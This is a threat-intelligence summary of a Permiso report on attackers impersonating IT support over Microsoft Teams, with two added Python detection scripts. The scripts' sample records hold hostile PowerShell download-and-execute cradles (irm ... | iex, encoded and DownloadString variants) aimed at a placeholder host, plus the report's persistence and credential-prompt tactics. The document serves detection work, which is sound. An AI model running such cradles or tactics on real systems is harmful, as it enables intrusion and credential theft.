2025-09-18

Social Engineering via Microsoft Teams Expands With Remote Access and PowerShell Payloads

Level: Tactical | Source: Permiso | Global


Permiso researchers report a sustained social engineering campaign that abuses Microsoft Teams to impersonate IT support and business help desks. The activity, which Permiso assesses has been ongoing since May 2024, involves threat actors building infrastructure on newly created or compromised Teams tenants so that they appear as trusted contacts. As Permiso explains, “These attacks typically involve direct messages or calls originating from newly created or compromised tenants, impersonating trusted contacts to gain remote access, presented as legitimate support, which then enables the deployment of malware onto the victim’s machine.” The attacker-controlled accounts follow common naming patterns such as “admin,” “engineering,” or “supportbotit.” Victims have primarily been located in English-speaking regions and span organizations of various sizes. Permiso notes this approach has been used by groups such as Scattered Spider and has links to ransomware operations like Black Basta, showing how broadly the tactic has been adopted over the past several months.

The intrusion chain typically begins with the actor establishing credibility over Teams and then directing the victim to install a remote access tool, frequently AnyDesk or Quick Assist, which gives the attacker interactive control of the host. Earlier campaigns often preceded the Teams contact with high-volume phishing emails, sometimes numbering in the thousands. Permiso reports, however, that recent campaigns have not consistently used this preliminary email step, suggesting that delivery varies across operators. In one examined case, the attackers ran a PowerShell command in a hidden window that downloaded a follow-on PowerShell script using "Invoke-RestMethod."
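The hidden-window PowerShell launch and the Invoke-RestMethod download are both visible in process-creation telemetry, so a detection engineer would want a triage routine that catches them even when the operator abbreviates the switches or hides the script behind -EncodedCommand. The following is an added example, not code from Permiso or Anvilogic: it parses constructed records shaped like Sysmon Event ID 1 fields (Image, CommandLine, ParentImage) and flags the combination of a hidden window with a download cradle, enriching the hit when the parent process is one of the remote access tools named in the report. The alias list (irm, iwr, DownloadString, DownloadFile) and the sample paths and URLs are assumptions for illustration; the report itself only names Invoke-RestMethod.

```python
"""Triage PowerShell process-creation events for a hidden-window download cradle.
Records below are constructed to resemble Sysmon Event ID 1 fields; they are not
real telemetry. Added example, not code from the Permiso report."""
import base64
import re

SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe")
REMOTE_ACCESS_PARENTS = ("anydesk.exe", "quickassist.exe")  # tools named in the report
# The report names Invoke-RestMethod; the aliases and WebClient methods are an
# assumption added here as the usual equivalents.
CRADLE = re.compile(r"\b(invoke-restmethod|irm|invoke-webrequest|iwr|downloadstring|downloadfile)\b", re.I)
PIPE_EXEC = re.compile(r"\b(invoke-expression|iex)\b", re.I)


def _basename(path):
    return path.strip('"').lower().rsplit("\\", 1)[-1]


def _is_prefix(token, full, min_len=1):
    """powershell.exe accepts any unambiguous prefix of a parameter name or enum
    value, so "-w h" selects -WindowStyle Hidden exactly like the full form."""
    token = token.lower()
    return len(token) >= min_len and full.startswith(token)


def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping double-quoted spans whole."""
    tokens, cur, quoted = [], [], False
    for ch in cmdline:
        if ch == '"':
            quoted = not quoted
        elif ch.isspace() and not quoted:
            if cur:
                tokens.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        tokens.append("".join(cur))
    return tokens


def decode_encoded_command(b64):
    """-EncodedCommand carries base64 of the UTF-16LE script text."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def analyze(record):
    """Return the indicators found in one process-creation record."""
    result = {"hidden_window": False, "encoded_command": False, "download_cradle": False,
              "pipes_to_exec": False, "remote_access_parent": False, "alert": False}
    if _basename(record.get("Image", "")) not in SCRIPT_HOSTS:
        return result
    cmdline = record.get("CommandLine", "")
    tokens = tokenize(cmdline)
    script_text = cmdline  # decoded -EncodedCommand payloads are appended to this
    for i, tok in enumerate(tokens[:-1]):
        if not tok.startswith("-"):
            continue
        name, value = tok[1:], tokens[i + 1]
        if _is_prefix(name, "windowstyle") and _is_prefix(value, "hidden"):
            result["hidden_window"] = True
        elif name.lower() in ("e", "ec") or _is_prefix(name, "encodedcommand", 2):
            result["encoded_command"] = True
            script_text += "\n" + decode_encoded_command(value)
    result["download_cradle"] = bool(CRADLE.search(script_text))
    result["pipes_to_exec"] = bool(PIPE_EXEC.search(script_text))
    result["remote_access_parent"] = _basename(record.get("ParentImage", "")) in REMOTE_ACCESS_PARENTS
    result["alert"] = result["hidden_window"] and result["download_cradle"]
    return result


# Constructed sample records; paths and URLs are placeholders, not indicators from the report.
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
_ENCODED = base64.b64encode(
    "Invoke-RestMethod -Uri http://stager.example.invalid/b.ps1 | Invoke-Expression".encode("utf-16-le")
).decode()
SAMPLE_RECORDS = [
    {"Image": _PS, "ParentImage": r"C:\Program Files (x86)\AnyDesk\AnyDesk.exe",
     "CommandLine": f'"{_PS}" -w hidden -nop -c "irm http://stager.example.invalid/a.ps1 | iex"'},
    {"Image": _PS, "ParentImage": r"C:\Program Files\WindowsApps\QuickAssist_placeholder\QuickAssist.exe",
     "CommandLine": f'"{_PS}" -WindowStyle Hidden -EncodedCommand {_ENCODED}'},
    {"Image": _PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": f'"{_PS}" -NoProfile -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1'},
    {"Image": r"C:\Program Files\PowerShell\7\pwsh.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'''pwsh.exe -w h -c "(New-Object Net.WebClient).DownloadString('http://stager.example.invalid/c')"'''},
]


def analyze_all(records=None):
    return [analyze(r) for r in (SAMPLE_RECORDS if records is None else records)]


if __name__ == "__main__":
    for rec, res in zip(SAMPLE_RECORDS, analyze_all()):
        print("ALERT " if res["alert"] else "ok    ", rec["CommandLine"][:70])
```

The prefix matching is the part most often missed: a rule that looks only for the literal string "-WindowStyle Hidden" will not fire on "-w h", and one that inspects only the raw command line will not see a cradle wrapped in -EncodedCommand. The third record shows an ordinary scripted inventory run staying quiet.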

The PowerShell script contains indicators tied to known clusters, specifically EncryptHub and Larva-208, in the form of static AES parameters reused across multiple campaigns. To control execution, the malware creates a mutex so that only one instance runs per host, which Permiso observes reduces noise and lowers the chance of detection. A notable defensive evasion step marks the PowerShell process as a critical process through a call to "RtlSetProcessIsCritical," meaning that terminating it would trigger a system crash. The script also gathers detailed system information, collecting IP addresses, UUIDs, and hardware attributes, then formats and encrypts the data for exfiltration.

Beyond reconnaissance, the script incorporates credential theft via a GUI prompt designed to resemble a legitimate configuration request; the entered credentials are stored locally before exfiltration. Persistence is maintained through scheduled tasks registered under deceptive names such as “Google LLC Updater,” or, failing that, registry autorun entries. The scheduled tasks retrieve and execute follow-on payloads from attacker-controlled infrastructure, while the fallback registry keys provide continuity if the tasks are removed. Permiso emphasized that these campaigns deliberately blend native system utilities, staged PowerShell execution, and credential harvesting, all supported by an evolving social engineering model designed to exploit trust in widely used enterprise collaboration tools.
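The evasion and persistence steps in the two paragraphs above each leave a distinct record: the RtlSetProcessIsCritical call and the mutex show up in PowerShell script block logging (Event ID 4104), the deceptively named task in scheduled task creation auditing (Security Event ID 4698, whose TaskContent field carries the task XML), and the fallback autorun in registry write telemetry (Sysmon Event ID 13). The following added example, not code from Permiso or Anvilogic, triages constructed events of those three types and explains why each one is or is not suspicious. The vendor word list, the script-host list, and all sample names, paths and URLs are assumptions for illustration; "Google LLC Updater" and RtlSetProcessIsCritical are the only values taken from the report.

```python
"""Triage script block, scheduled task and Run-key events for the evasion and
persistence behaviours described in the report. Sample events are constructed,
not real telemetry. Added example, not code from the Permiso report."""
import re
import xml.etree.ElementTree as ET

SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe")
VENDOR_WORDS = ("google", "microsoft", "adobe", "update")          # assumption: names a task may imitate
TRUSTED_DIRS = (r"c:\program files", r"c:\program files (x86)", r"c:\windows")
RUN_KEY = re.compile(r"\\software\\microsoft\\windows\\currentversion\\run(once)?\\", re.I)


def _basename(path):
    return path.strip('"').lower().rsplit("\\", 1)[-1]


def triage_scriptblock(script_text):
    """Event ID 4104: look for the critical-process call and a single-instance mutex."""
    reasons = []
    if re.search(r"RtlSetProcessIsCritical", script_text, re.I):
        reasons.append("marks its own process critical, so killing it crashes the host")
    if re.search(r"System\.Threading\.Mutex|CreateMutex", script_text, re.I):
        reasons.append("creates a named mutex as a single-instance guard")
    return reasons


def triage_scheduled_task(task_name, task_xml):
    """Event ID 4698: a vendor-style name whose action is a script host or an
    executable outside Program Files / Windows is the pattern the report describes."""
    reasons = []
    exec_node = ET.fromstring(task_xml).find(".//{*}Exec")
    if exec_node is None:
        return reasons
    command = (exec_node.findtext("{*}Command") or "").strip('"')
    arguments = exec_node.findtext("{*}Arguments") or ""
    vendorish = any(word in task_name.lower() for word in VENDOR_WORDS)
    if vendorish and _basename(command) in SCRIPT_HOSTS:
        reasons.append(f"vendor-style task name runs a script host: {command} {arguments}".strip())
    if vendorish and not command.lower().startswith(TRUSTED_DIRS):
        reasons.append(f"vendor-style task name but action is not under Program Files or Windows: {command}")
    return reasons


def triage_run_key(target_object, details):
    """Sysmon Event ID 13: Run/RunOnce value whose command launches a script host."""
    reasons = []
    if not RUN_KEY.search(target_object) or not details.strip():
        return reasons
    exe = details.split('"', 2)[1] if details.startswith('"') else details.split(None, 1)[0]
    if _basename(exe) in SCRIPT_HOSTS:
        reasons.append(f"Run key value launches a script host: {details}")
    return reasons


def triage(event):
    eid = event["EventID"]
    if eid == 4104:
        reasons = triage_scriptblock(event["ScriptBlockText"])
    elif eid == 4698:
        reasons = triage_scheduled_task(event["TaskName"], event["TaskContent"])
    elif eid == 13:
        reasons = triage_run_key(event["TargetObject"], event["Details"])
    else:
        reasons = []
    return {"EventID": eid, "suspicious": bool(reasons), "reasons": reasons}


# Constructed samples. The XML namespace is the one Task Scheduler uses; the
# names, paths and URL are placeholders, not indicators from the report.
TASK_NS = "http://schemas.microsoft.com/windows/2004/02/mit/task"


def _task_xml(command, arguments=""):
    return (f'<Task xmlns="{TASK_NS}"><Actions><Exec><Command>{command}</Command>'
            f'<Arguments>{arguments}</Arguments></Exec></Actions></Task>')


SAMPLE_EVENTS = [
    {"EventID": 4104, "ScriptBlockText": '$m = New-Object System.Threading.Mutex($false, "Global\\placeholder")\n'
                                         '# ... RtlSetProcessIsCritical ...'},
    {"EventID": 4698, "TaskName": r"\Google LLC Updater",
     "TaskContent": _task_xml("powershell.exe", "-w hidden -c irm http://stager.example.invalid/s.ps1|iex")},
    {"EventID": 4698, "TaskName": r"\GoogleUpdateTaskMachineUA",
     "TaskContent": _task_xml(r"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe", "/ua")},
    {"EventID": 13, "TargetObject": r"HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -File C:\Users\Public\u.ps1'},
]


def run_triage(events=None):
    return [triage(e) for e in (SAMPLE_EVENTS if events is None else events)]


if __name__ == "__main__":
    for res in run_triage():
        print(res["EventID"], "SUSPICIOUS" if res["suspicious"] else "ok", *res["reasons"], sep="  ")
```

The third sample is there on purpose: a real vendor updater task also carries a vendor word in its name, so the rule keys on what the task does (a script host, or a binary outside the vendor and system directories) rather than on the name alone. Pairing the 4698 and Event ID 13 hits for the same host is what exposes the report's task-then-registry fallback chain.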
